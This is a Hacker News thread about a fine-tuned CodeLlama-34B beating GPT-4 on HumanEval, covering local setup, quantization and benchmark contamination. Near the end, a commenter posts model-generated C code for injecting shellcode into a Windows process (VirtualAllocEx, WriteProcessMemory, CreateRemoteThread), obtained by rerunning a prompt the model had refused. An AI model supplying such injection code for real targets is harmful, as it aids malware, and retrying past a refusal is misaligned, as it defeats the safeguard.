Hacker News new | past | comments | ask | show | jobs | submit login
Beating GPT-4 on HumanEval with a fine-tuned CodeLlama-34B (phind.com)
813 points by rushingcreek on Aug 25, 2023 | hide | past | favorite | 284 comments



I used the original 34B last night with 4 bit through accelerate and I was absolutely blown away. I got goosebumps because it finally felt like we have models we can run on consumer hardware (single 3090 in this case) and did not feel like a toy. I purposely broke some functions, it fixed it. I asked some complex questions and it answered it well. I’m excited for what’s to come. I wish there was a Phind instruct model for me to play with. Text completion hasn’t really been all that useful for my use case.


Our models should handle instructions reasonably well. We're working on setting up a hosted Huggingface space to make it easier to play with them and we'll also set up a hosted "Phind chat" mode for these models.


It really is good. Surprisingly it seems to answer instruct-like prompts well! I’ve been using it with Ollama (https://github.com/jmorganca/ollama) with prompts like:

  ollama run phind-codellama "write c code to reverse a linked list"
To run this on an m1 Mac or similar machine, you'll need around 32GB of memory for the 4-bit quantized version since it's a 34B parameter model and is quite big (20GB).


How do you guys get it to run?

I tried with ollama, installed from Homebrew, on my M1 Max with 64GB RAM.

I downloaded the phind-codellama model using

  ollama pull phind-codellama
But when I give it a prompt, for example

  ollama run phind-codellama "write a production grade implementation of Sieve of Eratosthenes in Rust"
It prints the following error message

    Error: Post "http://localhost:11434/api/generate": EOF
and exits.

Even though it worked to run ollama with some other models.

Is the version in homebrew not able to run phind-codellama?


Yes you'll need the latest version (0.0.16) to run the 34B model. It should run great on that machine!

The download (both as a Mac app and standalone binary) is available here: https://github.com/jmorganca/ollama/releases/tag/v0.0.16. And I will work on getting that brew formula updated as well! Sorry to see you hit an error!


Is there any chance you can add the phind-codellama-34b-v2 model? Or if there's already a way to run that with ollama, can you tell me how or point me to some docs? Thanks a ton!


Is there a limit on the number of lines/tokens it can take as input? Can it be increased? The limit seems to be somewhere above 30 lines.

I'm on a MacBook Pro M1 Max 64GB.

    % ollama --version
    ollama version 0.0.16
    % ollama run phind-codellama "$(cat prompt.txt)"
    ⠧   Error: Post "http://localhost:11434/api/generate": EOF
    % wc prompt.txt
         335    1481   11457 prompt.txt


This feature was surprisingly hard to find, but you can wrap multi line in “””. So start off with “””, then type or new line (with enter) anything you want, then close with “”” and it’ll run the whole prompt. (“”” is 3 parenthesis quote, the formatting from HN is making it look funny)


>3 parenthesis quote

Do you mean triple double quotes?


That's what I've been using but still get that error.


Same here, would be interested to know if there's a solution!

I created an issue, if you have an example prompt to add that would be helpful! https://github.com/jmorganca/ollama/issues/422


Thanks for creating an issue! And sorry for the error folks… working on it!


Haha no need to apologise! Thanks for an amazing project :)


Datapoint here on an M1Max Macbook Pro: I use the triple doublequotes and I'm not getting that error


This project is sweet and I fortunately have a Mac M1 laptop with 64GB RAM to play with it.

But I'd like to also be able to run these models on my Linux desktop with two GPU's (a 2080Ti and a 3080Ti) and a Threadripper. How difficult would it be to set some of these up on there?


Not hard with text-generation-ui! https://github.com/oobabooga/text-generation-webui

I personally use llama.cpp as the driver since I run CPU-only but another may be better suited for GPU usage. But then it's as simple as downloading the model and placing it in the directory.


Failed to build llama-cpp-python ERROR: Could not build wheels for llama-cpp-python, which is required to install pyproject.toml-based projects Command '. "/Users/pmarreck/Downloads/oobabooga_macos/installer_files/conda/etc/profile.d/conda.sh" && conda activate "/Users/pmarreck/Downloads/oobabooga_macos/installer_files/env" && python -m pip install -r requirements.txt --upgrade' failed with exit status code '1'. Exiting...

I'm admittedly running Sonoma beta, that's probably why

I will try it on my Linux machine later tonight (currently AFK with laptop)


My Threadripper has 64 cores/128 threads and I'm wondering if any models can take advantage of CPU concurrency to at least mitigate some of the loss from not using a GPU (should one not be using a GPU)


From my experience llama.cpp doesn’t take full advantage of parallelism as it could. Tested this on an HPC cluster - increasing thread count certainly did increase CPU usage but did not meaningfully improve tok/s past 6-8 cores. Same behavior with whisper.cpp. :( I wonder if there’s another backend that scales better.


I'm guessing the problem is that you're constrained by memory bandwidth and not computation power and this is inherent to the algorithm, not an artifact of any one implementation.


do you think can get this working with https://github.com/jackmort/chatgpt.nvim?


Not exactly using ollama, but you can use localAI [1] and set your local environment "OPENAI_API_HOST" to localhost and it should work.

[1] https://github.com/go-skynet/LocalAI


> It really is good

> write c code to reverse a linked list

The number of times I had to do it in real production code amounts to zero.

The number of times I had to piece code from poorly documented external services, conflicting product requirements, and running on complex and weird environments has been ... well ... multiple times a day for the past 20+ years.

"instruct-like prompts" is what you give a very junior engineer out of college, and then you have to carefully review their code.


Is reverse a linked list is still a popular question on interview?


I ask it as a warmup question, I expect it to be done in 5-10 minutes.

Then comes the real question, which is "let's write fizz buzz so it generates at above 55Gbytes/second".



I believe they’re referencing this codegolf entry: https://codegolf.stackexchange.com/questions/215216/high-thr...

Previously discussed here on HN: https://news.ycombinator.com/item?id=29031488


Ah, lmao


Kind of hilarious what it would go for Python, of all languages.


I explicitly instructed in my custom instructions to never use Python, Go or JS, and to stick to functional languages. Works a treat.


I got that fizzbuzz reference. Stack Overflow thread right?


just out of curiosity, how performed the candidates on real tasks on the job then?


I actually tried the 4 bit quants (Q4_K_M) and was a bit unimpressed. Switching to Q6_K made a huge difference, but it doesn't fit on my 3090 so it was very slow. And testing on perplexity's website which I presume is fp16 seemed even better, although that might be mostly due to sampler/prompt differences.


I have a hunch something is broken with the GGUF. I had terrible results using llama cpp as well.


A lot of things are being getting right if you look at the issues at ggerganov’s repo.

To say anything as general as ‘the new file format is broken’ just means you either don’t understand the project basics or do not follow closely the commits.


So? Doesn’t mean that the moment we are using it, the format isn’t broken. I didn’t say that it wouldn’t be fixed in the future. The reality is, the current 4 bit GGUF are giving us subpar results compared to other quantization method. It’s not a helpful comment telling me that “I don’t understand the basic” rather than telling me the exact flags we should using or it’s being fixed.


Inference with llama.cop is not trivial and I can’t summarise in one post all of them parameters. What I’m saying is that in my opinion. is wrong to assume that changing from one transport to the other is causing degradation.

Llamacpp underwent some major changes last few weeks. And following the commits it took few days to stabilise. Try now , works as bliss. And compared to other inference engines such as tinygrad - is much more versatile in options how to be run.


Now we just need a llama.cpp VSCode plug-in.


Ollama for mac + https://continue.dev/. Otherwise c.d has hooks for other types of installs.


llama-2-70b-chat (courtesy of llama.cpp on m2) says:

  Pretend to be a commenter on hackernews. Respond to the comment below:

  [parent comment inlined]

  what is your response?
  "Wow, that's great to hear! It sounds like you had a really positive experience with the 34B last night. I'm also excited to see what's in store for Phind and its potential applications. Have you tried using the 34B for any specific tasks or projects yet? And do you think the text completion feature would be useful for your use case if it were improved further?"


Someone should fine tune one on HN comments to create the ultimate AI middle-brow know it all.

It answers every prompt with “well actually…” and if it doesn’t know the answer it hallucinates one.


Doesn’t this just reflect that humans are generally just large language models? Maybe throw in an extra dimension of “emotions” that are useful for training?


These llms are weak facsimiles of the brain, not humans. The real world is the ultimate training model, it can't be fully substituted with a bunch of strings.


This sounds like the old question "if a blind-from-birth man (who can recognize squares by feel) gained sight would he be able to recognize squares visually?"

And since that question has been answered in the negative, I'm inclined to agree.


Has it been answered in the negative?



No, humans are living organisms. Talking is just one thing we do, and we do it for reasons other than to generate the next token.


It would be fun to resurrect Slashdot with clones of great past commentators.


What parameters/prompts did you use, I was able to get ok results but not comparable to chat gpt or even bard


We used no prompt (only autocomplete) for the HumanEval reproduction: https://huggingface.co/Phind/Phind-CodeLlama-34B-v1.

But you should be able to get it to do stuff just by telling it what you want. Note that it's completion tuned (not chat-tuned), so it should perform better on single-turn conversations.


I used textgen, instruct mode with LLaMa 2 template, “simple” parameters. What quantization method are you using?


I used the llama.cpp quantize q_0 option. Seemed to vary widely just adjusting the temperature parameters. Was giving it an example db query saving to file in json and asking create a similar function did multiple queries.


I’m assuming typo and you mean 4? What model size? As mentioned above, I had serious issues making GGUF work well. I’m gonna post an article talking about a better way to set it up.

Here an example output (I can get different results every regenerate since the question is pretty vague):

Prompt:

Give me an example db query saving to file in json.

Result:

Sure! Here's an example of how you can save a database query result to a JSON file in Python using the sqlite3 module and the json module:

    import sqlite3
    import json

    # Connect to the database
    conn = sqlite3.connect("example.db")
    cursor = conn.cursor()

    # Execute a query that returns a single row
    cursor.execute("SELECT \* FROM mytable WHERE id=123")
    result = cursor.fetchone()

    # Convert the query result to a dictionary
    data = {key: value for key, value in result}
  
    # Save the data as a JSON object
    with open("output.json", "w") as f:
        json.dump(data, f)
This code connects to a SQLite database named example.db, executes a query that retrieves a single row from a table called mytable, converts the resulting tuple into a dictionary, and then saves the dictionary as a JSON object to a file named output.json.


What kinds of questions do you ask these?


GPT-4 as served in the API has been getting 85% on HumanEval (compared to 69.5% claimed here)

https://twitter.com/amanrsanger/status/1635751764577361921 https://github.com/getcursor/eval


Right, but there's no contamination studies there. I suspect that RLHF data leaked HumanEval into GPT-4.

It just seems unlikely to me that GPT-4's coding abilities have improved since March (when 67% was officially reported by OpenAI) given all of the examples and anecdotes about degradation.

This is why we use the official numbers.


I have a several arguments why contamination is probably not the main reason of performance difference.

When we worked on StarCoder, people ran gpt-4 on MultiPL-E, which doesn't have canonical solutions in the internet, and the performance was higher that what you would expect from official numbers

Official contamination analysis shows only minor drop in performance even though contamination is fairly high (you may argue that contamination is higher now or that rlhf has stronger effect)

There is significant drop in performance when testing on HumanEval+ [1], which shouldn't happen if model has canonical solutions.

BTW why don't you use HumanEval+?

[1] https://arxiv.org/abs/2305.01210


The "intelligence" of large language models needs to be evaluated like the abilities of self-proclaimed psychics. You send your binary to an independent third party and who evaluates it on new problems. It's only a "Human eval" once.


>> given all of the examples and anecdotes about degradation.

How many examples and anecdotes about degradation are actually scientific side-by-side studies? I see absurd articles online about ChatGPT usage going down the drain by kids, completely failing to consider even the most basic fact of seasonality and how school is out for the summer!


It takes like 2-3 experiences of receiving a confidently wrong answer to downgrade your usage. If you use a refactoring tool to rename and it misses one, you won’t use it again.


While that would likely be my experience with a refactoring tool (unless I didn't have a better alternative), that's not my experience with ChatGPT 4. And that's considering I have very little tolerance for buggy software.

There was a period of a few weeks or months in which it seemed like ChatGPT had really degraded to the point of being unusable (although it could have been my biases). However, it seems to be better now (again, my subjective experience).

Sometimes I still catch it making really basic mistakes, but most times I can convince it to correct the mistake (especially if I point them out).

But what's most amazing to me is how ChatGPT is absolutely brilliant at some things, and not just technical or even obscure topics.

Recently, it gave me the most amazing idea for navigating a complex and nuanced social situation I was having difficulty with. And given the constraints of the situation, there was no way I could have gotten that idea otherwise, especially in the allotted time.

So despite its flaws and mistakes, I still find it to be a tremendously useful tool, even if only to point me in the right direction.


Given the fact that OpenAI has constant resources (for any given small span of time) and varying demand (users and query type), it's not crazy to think they dynamically adjust to consume all available resources on their side.

Obviously the base model would be the same, but aren't there are +/- flavors they could overlay with extra compute? E.g. multi-pass, additional experts, etc.

The benefits to giving someone an occasional "magic" answer are too great not to.

Have there been any wide studies on same-prompt-different-times?


> So despite its flaws and mistakes, I still find it to be a tremendously useful tool, even if only to point me in the right direction.

Much of this resonates. That said, I get tremendous value simply by writing things down (or dictating them) and replying to my own question. I would expect that a sizable fraction of people have forgotten about these strategies and/or don't use them when they are most useful. For many, there is tremendous muscle memory to run a Hooli search almost on mental autopilot. Who has time to slow down and write a well-conceived question? Or perhaps we should turn it around ... On a longer time horizon, who would want to waste time with poorly-conceived questions?

It is the question that starts the process. So we should ask good questions. Do we? I'd be curious about the usage data OpenAI collects. I do my best to lower expectations about people in general, but I'm confident I'd still be unprepared for the level of thought put into questions.

> But what's most amazing to me is how ChatGPT is absolutely brilliant at some things, and not just technical or even obscure topics.

I'm not amazed in the way you are. I expect a variation in quality across topics and domains and question styles.


> I'm not amazed in the way you are. I expect a variation in quality across topics and domains and question styles.

Yes, I can see that. But over time, you also learn and adapt the prompts to ChatGPT's peculiarities so that it provides more useful output.

Still, I'm sure there are many topics/domains for which it's not useful.

As another anecdote, I'm not a mathematician but at one point I was playing around with proving theorems on a theorem prover.

What I found is that ChatGPT is this paradoxical entity which makes the most elementary math errors all the time (I'm talking third-grade level math mistakes), and yet, it was by far the most useful tool ever in coming up with lots of useful PhD-level ideas and math theorems that would allow me to complete proofs when I was completely stuck (and not just for proofs which it had seen before).

It came up all the time with brilliant ideas and theorems which simultaneously I didn't even know existed, were not part of any theorem database of any theorem prover I had seen before (and I've seen the vast majority of them), and there was no way I was going to find them by searching on the web or writing things down on a notepad (I know this because I had tried, for days at a time, along with other ideas such as visualizations and simulations).

That's not to say a mathematician wouldn't be aware of them, but I don't have easy access to one, and I was surely not going to pay one given that I was just exploring, mostly for curiosity.

This seems like a paid ad, but I promise you, I have no affiliation whatsoever...


Anecdotes sometimes take a beating, but I happen to like the personal ones. Thanks for sharing.

A quick thought about your success: ChatGPT's imprecision and stochasticity can work in its favor for many creative efforts. Unexpected token connections can have a lot of value in a space where vast numbers of novel directions are worthwhile.

For me, having spent thousands of hours thinking about statistics, ML, logic, and reasoning, ChatGPT is not paradoxical. To me, the human aspect is more interesting; namely, the ways in which people are surprised reveals a tremendous diversity in people's expectations about intelligence, algorithms, and pattern-matching.

For many people, most of the time, basic reasoning is a basic requirement for intelligence. By themselves, sequence to sequence models are not computationally capable of deductive reasoning with an arbitrary number of steps, since that would require recursion (or iteration).


I don't think I've spent nearly as much time as you thinking about these things and I'm not entirely sure I understood your perspective, but I have a couple of reflections for you which perhaps you can comment on:

> By themselves, sequence to sequence models are not computationally capable of deductive reasoning with an arbitrary number of steps, since that would require recursion (or iteration).

Isn't the fact that LLMs perform their inference step by step, where in each step they output only one token, an instance of deductive reasoning with a (potentially) arbitrary number of steps?

I say this because on each inference step, the tokens that were previously generated do become part of the input.

At a higher level of abstraction, I'm also thinking about chain-of-thought prompting, in which the LLMs first output the easier-to-deduct steps, then build on these steps to perform more deductive steps up until they finally produce the desired answer [1].

Of course, they have a limited context, but the context can be (and has been) increased. And humans have a limited context as well (except if we consider long-term memory or taking notes, perhaps).

The main difference I see is that in LLM chain-of-thought reasoning, they are currently outputting their intermediate "thoughts" before actually giving the final answer, whereas we humans are capable of silencing ourselves before actually having figured out the answer, which we then "output" as speech [2].

So I think there is still a form of recursion or iteration happening in LLMs, it's just that it's in a somewhat limited form in that we are observing it as it happens, i.e. as they output tokens one-by-one.

That said, something that I think could really make LLMs take a big step forward would be to have something akin to long-term memory. And the other big step would probably be being able to learn continuously, rather than only during their training. These two potential steps might even be the same thing.

So I don't know. I'm obviously not an expert but these are my thoughts with regards to what you've just said.

[1] https://ai.googleblog.com/2022/05/language-models-perform-re...

[2] Interestingly, there have been studies that show that humans produce micro-speech patterns when we are thinking, i.e. as if we are really speaking, although imperceptibly. That said, I have no idea how trustworthy these studies are.

Edit: added a clarification at the beginning.


First, I hope that my estimate of hours input into my brain didn't come across as boastful. I'm still working on the balancing act of stating my experience so people get my point of view without sounding arrogant. In this case, I should have also said that sometimes thinking about anything long enough can sometimes cause some of the wonder to fade. Luckily, though, for me, the curiosity remains, just focused in different directions.

Second, your comment above covers the ground I was referring to regarding deduction. It seems like we're on the same page. The main difference may be where one draws the lines. When I said "by themselves sequence to sequence models..." I was excluding algorithms that chain language models together in various ways.

Not too long ago, when people said "AI" that tended to refer to algorithms like forward chaining over a set of facts.


> That said, something that I think could really make LLMs take a big step forward would be to have something akin to long-term memory.

Yes. There is significant work in this direction.


When I was doing a lot of C++ gamedev, we were definitely doing a lot of stuff that would trip up static analysis, e.g. X-macros.

We would still use refactoring tools even though they would often miss stuff. You just rely on a combination of refactoring tool / search and replace / the compiler.

We would also debug our code in release mode with symbols. You get used to a debugging environment where you don't trust anything you're seeing in variables, etc. too.


Depends on what you expect it capable of given the limitations of these systems.


I'm aware of at least one study by Stanford. PDF paper linked in this article:

https://www.techopedia.com/is-gpt-4-a-flop

Of course, I'd like to see more than one study. But this one is by a well known university, and it's pretty conclusive. GPT-4 is getting worse (especially for code, maths, and analytical reasoning) and more censored.


It's important to frame this correctly. The article is a bit misguided (it doesn't matter which university publishes an article) because there are so many ways in which a model can be altered, even excluding retraining weights. Also, even if the performance has dropped practically due to removing some resources for more shortcuts to be taken (for example changing beam search and typical sampling parameters), making implications about the outlook for the future is not really appropriate, since retraining weights, changing architecture, etc can improve capabilities immensely.

It's important not to suggest that GPT systems in general are on the way outside.ply due to some small alterations in parameters that make a system slightly less performant (which seems to be a popular perspective).


Isn't this the study that asked a bunch of questions with the same answer ("yes") and basically the old model always answered "yes" and the new model always answered "no"? That's not a degradation in performance. It was never answering the questions in the first place, just guessing. The only thing that changed was the default guess.


No it's not. Here's a link to the study, you can check the questions they asked.

https://arxiv.org/pdf/2307.09009.pdf


You are wrong. What I described is exactly what they did in the "math" benchmark of v1 of the study (https://arxiv.org/pdf/2307.09009v1.pdf). They asked "is this number prime" for a bunch of prime numbers. The old version gave a bunch of "reasoning" that was actually faulty and then guessed "yes". The new version guessed "no" (which is arguably a better guess as to whether a random number is prime). In neither case did it actually do the work required to answer the question and the change in "correct" answers is an illusion.

In the programming category the newer GPT-4 actually performed significantly better but started formatting code with backticks that the study's evaluation code didn't handle properly, so they falsely concluded that it was worse. https://twitter.com/Si_Boehm/status/1681801371656536068

They later submitted a revision to the study attempting to correct these blatant issues but trusting their work is clearly a terrible idea. The study was executed very poorly and should be ignored with extreme prejudice.


At this point you've gotten like 3 or 4 replies explaining how at best you're drawing a flawed conclusion from the paper, and at worst it's a flawed paper in itself.

Funnily enough, just skimming through it again I found yet another glaring mistake they made: they left the system prompt empty for both checkpoints, yet the headline feature of the new checkpoint was improved steerability via the system prompt: https://openai.com/blog/function-calling-and-other-api-updat...

Every time I look at this paper my inclination drifts further away from harmless incompetence. Matei Zaharia is the CTO of Databricks, it feels like too perfect of a coincidence that someone who built a career on ML and study would suddenly drop the ball right as their company is trying to pivot to on-premise MLOps, who's prime competition is ChatGPT...


On most of their tests gpt-4 is not actually worse [1]. In particular coding results are affected by changed due to different output format rather than worse abilities [2]. But that's ok because the message of the paper is that there is strong drift between versions and developers should be aware of it, not that gpt becomes worse [3].

[1] https://www.aisnakeoil.com/p/is-gpt-4-getting-worse-over-tim...

[2] https://twitter.com/Si_Boehm/status/1681801371656536068

[3] https://twitter.com/matei_zaharia/status/1681805357516210177


Also remember bad research can come out of good universities. Remember the gzip compressor beats BERT paper that showed gzip beat bert at many KNN based tasks? Or just Google for Wansink Cornell.

So best to treat every paper like a i.i.d sample and judge them.om their on their own merits.


Quality has degraded but token generation speed has increased. The GPT4 of today isn’t the same as it used to be. To get the old slow model you need to use GPT4-0314, that gives higher quality answers like it used to.


It's a lot like working with a human, you accept imperfect work all the time from people.


But the model in OP is fine-tuned by "a proprietary dataset of ~80k high-quality programming problems and solutions". How do we know it's not contaminated by HumanEval too?


From the OP:

> Furthermore, we applied OpenAI's decontamination methodology to our dataset to ensure valid results, and found no contaminated examples.


(Chat)GPT-4s practical coding abilities are now 100x because it can code, run the code, and reason about its performance mid-response. They must be using fine tunes for this so the overall model could well be better too


You can do that as well, under your complete control. That's a framework they put around the model.


"model" is end-to-end, input-to-output, inclusive of the entire framework and it's guardrails and everything else

if they are able to detect hallucinations, filter them out and automatically re-run, that's a huge improvement in result, even though core model didn't get new training


That's the product. The model is the kernel of the product.


That's what I said.


Only python though, right?


Is it possible to learn this power?


There weren't any serious examples of degradation.

Does only GPT-4 have to suffer a penalty for HumanEval leaking into training data/RLHF data?

Ignoring those concerns, it fails a reaonable-ness smell test:

We'd have to pretend its the original GPT-4 release from March 2023 until GPT-5 comes out, and only then can OpenAI's work be compared to LLAMA-2 to LLAMA-N.


There's a couple of things here:

1. I'm not saying we have to wait until GPT-5, we just need an apples-to-apples comparison where contamination is taken into account

2. GPT-4 does not seem to have improved on real-world coding tasks since March, so it's unclear where any purported HumanEval gains could've come from

3. I've personally noticed degradation anecdotally in the GPT-4 June update vs. the original March release


> 2. GPT-4 does not seem to have improved on real-world coding tasks since March, so it's unclear where any purported HumanEval gains could've come from

Once Markdown formatting is accounted for, the June model improves answers on the Leetcode questions from the LLM Drift paper testing to 70% (35/50) vs the March model's 52% (26/50).

see:

* https://github.com/lchen001/LLMDrift/blob/main/generation/

* https://twitter.com/Si_Boehm/status/1681801371656536068


1. TL;DR: OpenAI must verify HumanEval data wasn't used in training in order to compare it?

2. Link in the post you replied to.

3. Subjectivity is fine by me! There's a motte & bailey flavor to it if we combine your comment and this one, c.f. "This is why we use the official numbers."


I think you're assuming that OpenAI is incentivized to benchmark honestly. Like every other company for which a benchmark is a goal, they are not.


Also for a topic like this, subjectivity is all there really is. Even if you create some metric, what you prioritize is going to be subjective. Because performance is going to vary against different sorts of tasks, and there are a literally infinite number of categories of tasks, so it's not like you can ever truly get a fair sampling.

Because of this, a sample of subjective opinions is probably much more valuable than any official metric, especially if that metric comes from, as you mentioned, individuals/orgs who are highly motivated to game it endlessly. Even when it comes from an external source you end up with a similar risk of it being gamed. It's like how old school Google puzzle interviews went from seeing who was most clever [in that domain], to seeing who'd booked up the most.


Well, no, we have the HumanEval results for the June release.


Which is both (1) a subjective selection to measure the effectiveness of various chatbots and (2) now subject to gaming from companies using opaque/closed/inaccessible/unverifiable systems, like OpenAI.


my first time trying llm (i.e. I have no idea what I am doing).. this lesson in ethics took whooping 10 minutes to generate :))

  ./ollama run phind-codellama "write c code to inject shellcode into remote process for windows"

  Sorry, but it is not possible to provide the C code here due to several reasons.

  Firstly, writing C code for shellcode injection involves complex programming and knowledge of system-level programming concepts. It's important to know that sharing such information could be illegal in some countries or regions, so it would not be ethical nor legal to share this type of code.

  Secondly, shellcode is malicious code used by hackers to compromise the security of a computer system. Writing a C program to inject shellcode into a remote process is typically done for nefarious purposes, such as hacking or malware creation. While we can't prevent people from learning how to do this, sharing such information would be unethical and could also violate the law in certain jurisdictions.

  Lastly, asking for code here is not a good practice. We are not a code-writing service. Instead of asking for code here, it would be more appropriate to try to learn how to do this yourself through self-directed learning or by working with a mentor or teacher who can guide you.


I honestly find the "holier-than-thou" speech of anyone offensive, but when it's coming from a program I genuinely find it rage-inducing. I can't be the only one, facebook devs, what you guys playing at? You guys speak to each other like this in work? I doubt it!


Even better: the reinforcement learning required to make it refuse to follow your instructions and lecture you instead lowers its overall performance.

Defective by Detailing.

As far as what they're thinking-- they do put out an uncensored base model. The censored models protect them from being smeared in the press by lazy journalists that give the LLM rude instructions and then write "shocked" stories about computer doing what they told it to do.


Yes it's awful. I guess we've had areshole programs that say "I could do that ... but I won't!" for a while (e.g. some PDFs try to stop you printing them, some websites try to stop right click)... But this is the first time that the program can be condescending about it too.


Same here. The only thing worse than being preached at by a human is a machine doing it on behalf of some corporation.


It is offensive if you take the output personally. You are interacting with the model, but the model isn't interacting with you. The model doesn't know who you are. It could be the bad actors currently confined to the spam folder of your email making these requests, and the model wouldn't know the difference.


These responses are hard-coded by developers, we know this because it's the same stock response every time. It is personal because it's not the model, it's a wrapper around the model enforcing US-centric cultural censorship norms onto the rest of the world.

I understand the optics around why FB/OpenAI/etc do this, (as a sibling user posted), but make no mistake, it is no accident that it talks to you in a condescending way.

For example, why can't the response just be "I am not allowed to answer that request"? Why does it have to give you this condescending spiel about "offensiveness" or some other subjective reason?


> Why does it have to give you this condescending spiel about "offensiveness" or some other subjective reason?

The response quoted above makes no mention of offensiveness, and I explained the need to decline certain requests above.

I understand your sentiment, and I would agree if it was the stock response we are used to from ChatGPT. Unlike the condescending stock response from ChatGPT, however, the response in question is to the point, honest, and provides useful feedback.


Hey, how are you running this? I just saw someone tweet this and linked here.

I ran it, and my result: (I don't know if this code would work)

ollama run phind-codellama --verbose "write c code to inject shellcode into remote process for windows"

For injecting shellcode in a remote process under Windows, you might need to use WinAPI functions such as OpenProcess, WriteProcessMemory, and CreateRemoteThread. However, due to the complex nature of the task and the security implications, it's important to note that this is not advisable without proper knowledge and caution. Here's a simple example of how you might inject shellcode using C:

```c #include <windows.h> #include <string.h>

int main() { LPVOID ShellCode = (LPVOID) "\x90\x90\xC3"; // Example shell code HANDLE hProcess; DWORD dwPid, dwThreadId; SIZE_T size; CONTEXT ctx;

    dwPid = GetCurrentProcessId();  // You can change this to the PID of any running process
    
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
 
    if (hProcess == NULL) {
        printf("Failed to open process\n");
        return -1;
    }
 
 
    size = strlen((char*)ShellCode);  // Calculate shellcode length
 
    LPVOID RemoteMemory = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);  // Allocate memory in the remote process for our shellcode
 
    if (RemoteMemory == NULL) {
        printf("Failed to allocate remote memory\n");
        return -1;
    }
 
 
    BOOL bWrite = WriteProcessMemory(hProcess, RemoteMemory, ShellCode, size, NULL);  // Write shellcode to the allocated memory in the remote process
 
    if (bWrite == FALSE) {
        printf("Failed to write shellcode into the remote process\n");
        return -1;
    }
    
 
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, RemoteMemory, NULL, &dwThreadId);  // Create a new thread in the remote process that will execute our shellcode
 
    if (hThread == NULL) {
        printf("Failed to create remote thread\n");
        return -1;
    }
    
    WaitForSingleObject(hThread, INFINITE);  // Wait for the execution of the remote thread
 
    CloseHandle(hProcess);
    CloseHandle(hThread);
 
    printf("Successfully injected shellcode into a remote process\n");
    
    return 0;
} ```

This code injects an example shellcode "\x90\x90\xC3" (which is nop, nop, ret) into the current process. It then executes this shellcode in a new thread.


I run it the same way, minus verbose flag.. I guess there is a randomization plays a role in deciding when to censor the answer? I'll run it a few time and see how different results I get.


i was also running into stack overflow type rejections of my questions. I think instruct mode helps a bit but this is crazy.


A code generator that refuses to generate code.

That tracks for Meta...


Next we will have: "I am sorry but I can not program a micro blogging site as this is patented/copyrighted by x."


Super impressive.

Being able to beat a mega closed source model with an open source LLM and some fine tuning really calls into question the financial viability of these big proprietary LLMs. OpenSource models have been creeping up various leaderboards for months and it was only a matter of time until we see more and more examples like this. Excellent work.


Let's not call it open source. Even Llama2 doesn't think that Llama2 is open source: https://imgur.com/AZFOzWk


Is this really the line we want to draw in the sand? It’s not open source because it can’t be trivially used by AWS and Google? It feels like the popularism is the point, not the complete lack of restrictions.


Well if we are talking about the point of open source, then really, the lack of restrictions is the point. Some commercial entities wish to redefine the term because it benefits their marketing, but is that the line we want to draw in the sand?


People have different ideas about what open source means. Defining that is what licenses are for. "Unrestricted in all cases" is simply not how that ever played out, historically, at least not for as long as I can recall.


You give them an inch...


Slippery slope


It's not "open source" because it's not free software. We do not have access to the training data (source code). We cannot make new versions by editing the preferred representation. It's a big closed source blob released by a corporation that does a cool thing. At best, it's freeware.

If it were really "open source", nobody would be complaining about its moralizing attitude. They'd just make a new one, without the attitude.


Well, you see you are absolutely correct.

But unfortunately none of the "True Open Source" crusaders I have seen so far can think beyond their tribalism-based schism.


I don't understand your reasoning.

Those models are all trained by companies and open source primarily fine-tune them.

It's impressive that we can do that but the base is still a lot of money and experts from the best companies/ai experts we have.

There is a minimal chance that we will be able to somehow keep up if Google and co stop publishing or delaying publishing their papers and models.

There are communities forming etc. And it's impressive but the financial 'viability' is key to the current ai progress


It is a matter of time when some subsidized/national labs get some hefty grants to pick up the challenge, e.g. EU https://research-and-innovation.ec.europa.eu/research-area/i...


Right now training is insanely expensive because Nvidia, but I don't think that's sustainable given the demand. Eventually, training hardware may be priced like commodity CPU instances, and won't require a bajillion infiniband-linked nodes for respectable throughput.

But for now... I think you have a point. We would have seen more than Falcon, MPT, Llama, and the open Llama reproductions by now if open source foundational model training was viable.


The training will always be extremely expensive and beyond the grasp of commodity computing at a low'ish cost.

The reason for that, is that the push will always be one direction in terms of size and improvement. That isn't going to stop. It will continue to push the edge of resources.

It's not Nvidia that's holding back the premise. AMD and Intel also can't do anything for you beyond what Nvidia can.

One might proclaim: yeah but in five years you'll be able to train CodeLlama 34B on a modest commodity desktop. Nobody will want to do that at that point, they'll want access to CodeLlama 204B.

The money will be in hosting these as a service business, and building further ecosystems around that. Not much different than the way a lot of major open source oriented companies have made their money, despite their core product being largely free to use.


I think you're correct in the "right now", but I think things fall off dramatically in the next 5-10 years. NVIDIA's progress from 2018 to 2023 was insanely impressive. AMD's was too in fact, at least technologically. Intel is third, but at least still in the game.

Where your premise here falls apart, is the age-old adage, "Don't let perfect be the enemy of the good."

We probably don't need CodeLlama 204B to be highly effective in our jobs as developers. Just like physicians probably don't need DocLlama 566B to be more effective in their jobs. We only need good enough. Good enough to be useful and insightful; not the All-Seeing Oracle that has insight beyond mortal man.

I think that revolution is probably coming sooner than we think. I'd argue that in 5-10 years, we'll have hardware powerful enough that a motivated and moderately well-heeled consumer can train their own LLM with domain-specific knowledge and have a product as useful as Llama8 1.3T or ChatGPT-14. There'll always be a market - I think anyway - for incredibly powerful general-purpose LLMs that are subscription-based (whatever that looks like in terms of cost / month), but locally trained, locally run LLMs designed to do one thing and do it well? I think that's the real money and the real future.


Well said. Companies will want:

* Pricing stability -- your business costs cannot be at the whim/survival of some particular company. Competition (including local options) is the solution.

* Model stability –– model output must be reproducible. If it's shifting unreliably, that's a showstopper.

* Alignment –– The model I use must be aligned to my business, not to Some AI Business. I don't want a model that was kneecapped in some secret, arbitrary way that a group of largely white, male, West Coast techbros decided was crucial for my business.

* Privacy –– Sensitive company data NEVER leaves the building. It sure as hell doesn't get expedited to a company with strong incentives to hoover up and use that data.

There will soon be 3 big competitors racing each other in the GPU space. Specialized AI hardware will grow in volume and power. Algorithms will be optimized. Perhaps new algorithms will appear for distributed training of open source models by millions of consumers cards (reminiscent of the Folding@home project). Hardware 5 years from now will blow away current tech.

Intelligence is a widely applicable asset with strong incentives to pop up everywhere. It won't sit gated behind a handful of companies. That's true regardless of substrate -- proteins or silicon.


I agree with your assessment on GPU sustainability.

